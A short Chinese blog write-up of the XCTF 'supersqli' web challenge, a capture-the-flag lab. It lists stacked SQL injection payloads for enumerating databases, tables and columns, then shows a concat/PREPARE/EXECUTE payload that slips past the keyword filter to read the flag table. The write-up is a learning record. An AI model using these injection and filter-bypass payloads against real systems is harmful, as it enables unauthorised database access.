攻防世界web进阶区supersqli

打开链接,初步判断应该是sql注入
攻防世界web进阶区supersqli顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入
攻防世界web进阶区supersqli
先1’,报错
攻防世界web进阶区supersqli
再–+,发现被正则过滤,大小写也不行

攻防世界web进阶区supersqli
看了看大佬的wp,堆叠注入(呜,新名词。。。)

inject=1’;show databases;#

攻防世界web进阶区supersqli
inject=1’;show tables;#

攻防世界web进阶区supersqli看一下这几个表
1’;show columns from words;#
1’;show columns from 1919810931114514;# (字符串为表名操作时要加反引号)
1’;show columns from hahahah;#
最后发现在1919810931114514这个表里
攻防世界web进阶区supersqli然后用concat绕过
1’;use supersqli;set @sql=concat(‘s’,'elect * from 1919810931114514');PREPARE pre FROM @sql;EXECUTE pre;–+
(这个牛批)
攻防世界web进阶区supersqli

得到了flag

//知识基础太弱,sql注入不会。。。

2020.7.24 公瑾